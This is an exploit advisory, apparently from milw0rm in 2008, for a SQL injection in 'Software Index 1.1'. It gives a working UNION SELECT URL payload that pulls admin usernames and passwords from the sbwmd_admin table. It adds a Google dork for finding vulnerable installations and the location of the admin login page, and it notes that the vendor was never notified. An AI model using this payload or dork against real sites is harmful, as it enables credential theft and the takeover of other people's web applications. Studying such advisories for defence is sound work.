41 lines
No EOL
1.1 KiB
Text
41 lines
No EOL
1.1 KiB
Text
--==+================================================================================+==--
|
|
--==+ Software Index 1.1 SQL Injection Vulnerbilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
Discovered By: t0pP8uZz & xprog
|
|
Discovered On: 6 April 2008
|
|
|
|
Script Download: http://www.turnkeyzone.com
|
|
|
|
DORK: inurl:"add_soft.php"
|
|
|
|
Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
DESCRIPTION:
|
|
Software Index 1.1 is vulnerable due to multiple insecure mysql querys.
|
|
|
|
|
|
|
|
SQL Injection:
|
|
http://site.com/showcategory.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(0x3C666F6E7420636F6C6F723D22726564223E,admin_name,0x3a,pwd,0x3C2F666F6E743E),3,4,5/**/FROM/**/sbwmd_admin/*
|
|
|
|
|
|
|
|
NOTE/TIP:
|
|
admin login is at /siteadmin/
|
|
|
|
|
|
|
|
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Software Index 1.1 SQL Injection Vulnerbilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-04-05] |